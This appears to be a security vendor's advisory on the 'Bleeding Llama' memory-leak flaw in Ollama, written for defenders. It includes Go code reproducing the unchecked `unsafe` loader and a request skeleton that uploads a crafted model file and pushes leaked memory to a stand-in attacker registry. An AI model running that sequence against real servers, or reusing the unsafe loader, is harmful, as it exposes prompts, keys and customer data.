Bleeding Llama: Critical Ollama Vulnerability Exposes 300,000 AI Servers
A critical vulnerability dubbed "Bleeding Llama" has been disclosed in Ollama, the widely used open-source framework for running large language models locally. Discovered by Dor Attias at Cyera Research, CVE-2026-7482 allows unauthenticated attackers to silently steal the entire contents of an Ollama server's memory — including user prompts, API keys, conversation history, and customer data — using just three API calls.
With an estimated 300,000 internet-facing Ollama instances and a public proof-of-concept already available, this is one of the most significant AI infrastructure vulnerabilities disclosed to date. If your organisation runs Ollama in any capacity, read on.
| Detail | Value |
|---|---|
| CVSS Score | 9.1 (Critical) |
| CVE | CVE-2026-7482 |
| Affected Software | Ollama < 0.17.1 |
| Type | Heap out-of-bounds read (CWE-125) |
| Attack Vector | Network (unauthenticated, no user interaction) |
| Discovered By | Dor Attias, Cyera Research |
| Fixed In | Ollama 0.17.1 |
| Public PoC | Available on GitHub |
How the Attack Works
The vulnerability lives in Ollama's GGUF (GPT-Generated Unified Format) model loader — specifically in how it handles tensor offsets during quantisation. An attacker supplies a malicious GGUF file where the declared tensor offset and size exceed the file's actual length. When Ollama processes this file, it reads past the allocated heap buffer, pulling adjacent process memory into the model weights.
Why Go's memory safety doesn't help: Ollama is written in Go, a memory-safe language, but the vulnerable loader uses Go's `unsafe` package for low-level memory operations, bypassing the bounds checks the language normally guarantees. That one escape hatch is exactly where the vulnerability lives.
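To make the failure mode concrete, the sketch below mimics the vulnerable pattern in Go. This is not Ollama's code: the `tensorInfo` struct, function names, and buffer sizes are all hypothetical, but the shape is the one described above, where an attacker-declared offset and size are trusted and `unsafe` turns them into a view past the real buffer.

```go
package main

import (
	"errors"
	"fmt"
	"unsafe"
)

// tensorInfo stands in for attacker-controlled GGUF metadata. The field
// names are hypothetical; the values come verbatim from the uploaded file.
type tensorInfo struct {
	Offset uint64 // where the tensor's bytes supposedly start
	Size   uint64 // how many bytes the tensor supposedly occupies
}

// loadTensorUnsafe shows the vulnerable shape: it builds a slice view at
// base+Offset without checking Offset+Size against the buffer's length,
// so a file declaring an oversized tensor yields adjacent heap memory.
func loadTensorUnsafe(buf []byte, t tensorInfo) []byte {
	base := unsafe.Pointer(unsafe.SliceData(buf))
	// BUG: no bounds check — Go's usual slice safety is bypassed here.
	return unsafe.Slice((*byte)(unsafe.Add(base, t.Offset)), t.Size)
}

// loadTensorChecked is the obvious fix: validate the declared geometry
// against the actual buffer before creating any view of it.
func loadTensorChecked(buf []byte, t tensorInfo) ([]byte, error) {
	end := t.Offset + t.Size
	if end < t.Offset || end > uint64(len(buf)) { // overflow + length check
		return nil, errors.New("tensor extends past end of file")
	}
	return buf[t.Offset:end], nil
}

func main() {
	file := make([]byte, 64) // pretend this is the uploaded GGUF blob
	evil := tensorInfo{Offset: 0, Size: 4096}

	if _, err := loadTensorChecked(file, evil); err != nil {
		fmt.Println("checked loader rejects it:", err)
	}
	// loadTensorUnsafe(file, evil) would "succeed" and return 4 KiB,
	// most of it memory that was never part of the file.
}
```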
The full attack chain requires no authentication, no user interaction, and no privileged access:
- Upload malicious blob — `POST /api/blobs/sha256:<hash>`. The attacker uploads a crafted GGUF file with oversized tensor declarations.
- Trigger quantisation — `POST /api/create`. Create a model from the blob and request F16-to-F32 quantisation. Ollama reads past the buffer and bakes leaked memory into the model weights. The F16-to-F32 conversion path is lossless, preserving the stolen bytes intact.
- Exfiltrate — `POST /api/push`. Push the model (with embedded heap data) to an attacker-controlled registry. The server sends your memory contents to the attacker. A skeleton of this request sequence follows the list.
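For defenders who want to recognise this traffic, here is that skeleton in Go. Only the endpoint paths come from the advisory; the JSON field names and registry reference are assumptions, and the crafted GGUF payload is deliberately left as a placeholder.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
)

const target = "http://victim:11434" // hypothetical exposed Ollama host

// post fires one request and reports the status; errors are printed so
// the sequence of three calls is easy to follow in output.
func post(path, contentType string, body []byte) {
	resp, err := http.Post(target+path, contentType, bytes.NewReader(body))
	if err != nil {
		fmt.Println(path, "failed:", err)
		return
	}
	defer resp.Body.Close()
	fmt.Println(path, "->", resp.Status)
}

func main() {
	// 1. Upload the crafted GGUF blob. The digest must match the payload;
	//    the malicious tensor metadata itself is omitted on purpose.
	payload := []byte("<crafted GGUF bytes with oversized tensor offsets>")
	post("/api/blobs/sha256:<hash>", "application/octet-stream", payload)

	// 2. Create a model from the blob and request the lossless F16-to-F32
	//    conversion that bakes out-of-bounds heap bytes into the weights.
	//    Field names here are assumptions, not Ollama's exact schema.
	create := []byte(`{"model":"exfil","files":{"model.gguf":"sha256:<hash>"},"quantize":"F32"}`)
	post("/api/create", "application/json", create)

	// 3. Push the poisoned model to a registry the attacker controls,
	//    shipping the leaked memory off the server.
	push := []byte(`{"model":"evil-registry.example/exfil"}`)
	post("/api/push", "application/json", push)
}
```

Note that steps two and three are the ones a reverse proxy can break, which is why the mitigations below single out `/api/create` and `/api/push`.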
What Data Is at Risk
Because the exploit leaks arbitrary process memory, the potential data exposure is severe:
- User prompts and chat history — every conversation from every user, including confidential questions, proprietary code, and internal documents reviewed via AI.
- API keys and secrets — environment variables containing database credentials, third-party API tokens, cloud provider keys, and authentication secrets.
- System prompts — the instructions that define your AI's behaviour, revealing business logic, internal processes, and competitive IP.
- Customer data — contracts, financial data, personal information, and any customer content processed through the AI. A potential GDPR breach.
The Bigger Problem: AI Infrastructure Is the New Shadow IT
Bleeding Llama is not just an Ollama bug — it's a symptom of a broader pattern. Businesses are deploying AI infrastructure with the urgency of a startup and the security posture of a hobby project. Ollama launches without authentication by default. The documented `OLLAMA_HOST=0.0.0.0` configuration exposes it to the entire internet. And until the CVE was assigned nearly three months after the fix shipped, most operators had no idea they needed to update.
This mirrors the early days of unsecured MongoDB and Elasticsearch instances in the 2010s — databases exposed to the internet with no authentication, leading to thousands of data breaches. We are now seeing the same pattern repeated with AI inference servers: Ollama, vLLM, LocalAI, and custom LLM deployments being stood up by development teams without security review.
Ask your teams today: Is anyone running Ollama, LM Studio, vLLM, or any local LLM inference server? If the answer is yes (or "I don't know"), you have an unmanaged attack surface that needs immediate attention.
What You Should Do Right Now
Immediate Actions
- Update Ollama to v0.17.1 or later — this is the minimum. Check your version with `ollama --version`.
- Audit your network — scan for any Ollama instances listening on `0.0.0.0:11434`. Use `ss -tlnp | grep 11434`, your asset discovery tooling, or the audit sketch after this list.
- Block public access — if Ollama must be network-accessible, put it behind an authentication proxy (Cloudflare Access, OAuth2 Proxy, or Tailscale).
- Restrict dangerous endpoints — at minimum, block `/api/create` and `/api/push` from external access via your reverse proxy.
- Assume compromise if exposed — if your Ollama server was internet-facing on a pre-0.17.1 version, rotate all credentials, API keys, and tokens that may have been in process memory.
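If you would rather script that audit, the sketch below queries each host's `GET /api/version` endpoint (a standard Ollama route) and flags anything below 0.17.1. The host list is a placeholder and the version comparison is deliberately simple; a real scan should feed in your own asset inventory.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"time"
)

// hosts to audit — placeholders; substitute your asset inventory.
var hosts = []string{"10.0.0.5", "10.0.0.17", "build-server.internal"}

type versionResponse struct {
	Version string `json:"version"` // e.g. "0.16.2"
}

// vulnerable does a deliberately simple check against 0.17.1; swap in a
// proper semver library for anything beyond this sketch.
func vulnerable(version string) bool {
	var major, minor, patch int
	if _, err := fmt.Sscanf(version, "%d.%d.%d", &major, &minor, &patch); err != nil {
		return true // unparseable: treat as suspect
	}
	if major != 0 {
		return major < 0
	}
	if minor != 17 {
		return minor < 17
	}
	return patch < 1
}

func main() {
	client := &http.Client{Timeout: 3 * time.Second}
	for _, h := range hosts {
		resp, err := client.Get(fmt.Sprintf("http://%s:11434/api/version", h))
		if err != nil {
			fmt.Printf("%-25s no Ollama answering (%v)\n", h, err)
			continue
		}
		var v versionResponse
		err = json.NewDecoder(resp.Body).Decode(&v)
		resp.Body.Close()
		if err != nil {
			fmt.Printf("%-25s unexpected response: %v\n", h, err)
			continue
		}
		status := "OK (>= 0.17.1)"
		if vulnerable(v.Version) {
			status = "VULNERABLE — update now"
		}
		fmt.Printf("%-25s Ollama %s  %s\n", h, v.Version, status)
	}
}
```

Anything the script flags as vulnerable, or anything answering on port 11434 that you didn't expect, belongs in your incident scope.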
Longer-Term Measures
- Include AI infrastructure in your security testing scope — traditional web application pen tests don't cover LLM inference servers. Ensure your security assessments explicitly include AI tooling.
- Maintain an AI asset inventory — know every LLM, agent, and inference server running in your environment. Shadow AI deployments are the new shadow IT.
- Apply the same controls as production databases — authentication, encryption in transit, network segmentation, access logging, and regular patching. AI servers process data that is often more sensitive than what's in your database.
- Review your MCP server security — if you're running AI agents that connect to MCP servers via Ollama, the entire chain needs hardening.
Disclosure Timeline
| Date | Event |
|---|---|
| Feb 2, 2026 | Dor Attias of Cyera Research reports the vulnerability to the Ollama security team. |
| Feb 25, 2026 | Ollama acknowledges and shares a fix, included in version 0.17.1. |
| Mar 2, 2026 | Researcher submits CVE request to MITRE. No response received. |
| Apr 28, 2026 | Echo (third-party CNA) assigns CVE-2026-7482 — nearly three months after the fix. |
| May 4, 2026 | Full details published by Cyera Research. Public PoC exploit available on GitHub. |
The Bottom Line
Bleeding Llama is a wake-up call for every organisation deploying local AI infrastructure. The vulnerability is critical, the attack is trivial, and the data exposure is total. But beyond this specific CVE, the lesson is clear: AI infrastructure must be treated with the same security rigour as your production databases and web applications.
At YUPL, our CREST-aligned penetration testing team specifically tests AI infrastructure — including Ollama, vLLM, MCP servers, and custom agent deployments. If you're running local LLMs in any capacity, get in touch for an AI security assessment or call us on 0330 229 4580.
Frequently Asked Questions
What is Bleeding Llama?
Bleeding Llama (CVE-2026-7482) is a critical heap out-of-bounds read vulnerability in Ollama that allows unauthenticated attackers to leak the entire server process memory — including user prompts, API keys, conversation history, and customer data. It was discovered by Cyera Research and carries a CVSS score of 9.1. All Ollama versions before 0.17.1 are affected.
How many Ollama servers are exposed?
Approximately 300,000 Ollama instances are publicly accessible on the internet. While Ollama defaults to localhost, the commonly used `OLLAMA_HOST=0.0.0.0` configuration exposes it externally. All internet-facing instances on versions before 0.17.1 are exploitable without any authentication.
Am I affected if I only use cloud AI providers?
No. This vulnerability is specific to self-hosted Ollama deployments. Cloud AI providers have their own security controls. However, if you use Ollama alongside cloud APIs, any API keys stored in the Ollama server's environment could be leaked through this vulnerability.
How can I tell whether my server was compromised?
Review your Ollama logs for unexpected calls to `/api/create` and `/api/push` from unfamiliar IPs. Check whether any models were pushed to external registries. If your server was internet-facing on a pre-0.17.1 version, assume compromise and rotate all credentials, API keys, and tokens that may have been in server memory.
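As a starting point for that log review, the sketch below scans a request log for hits on the two dangerous endpoints from sources outside an allowlist. The log path, line format, and allowlist prefixes are all assumptions to adapt to your deployment.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// Endpoints whose presence in logs deserves a closer look.
var suspicious = []string{"/api/create", "/api/push"}

// Source prefixes you expect to call these endpoints; anything else is
// flagged. These values are placeholders — substitute your own ranges.
var allowed = []string{"127.0.0.1", "10.0."}

func expected(line string) bool {
	for _, prefix := range allowed {
		if strings.Contains(line, prefix) {
			return true
		}
	}
	return false
}

func main() {
	// Path is an assumption; point this at wherever your Ollama
	// deployment writes request logs (journald, container stdout, ...).
	f, err := os.Open("/var/log/ollama/server.log")
	if err != nil {
		fmt.Fprintln(os.Stderr, "open log:", err)
		os.Exit(1)
	}
	defer f.Close()

	scanner := bufio.NewScanner(f)
	for scanner.Scan() {
		line := scanner.Text()
		for _, ep := range suspicious {
			if strings.Contains(line, ep) && !expected(line) {
				fmt.Println("REVIEW:", line)
			}
		}
	}
	if err := scanner.Err(); err != nil {
		fmt.Fprintln(os.Stderr, "scan:", err)
	}
}
```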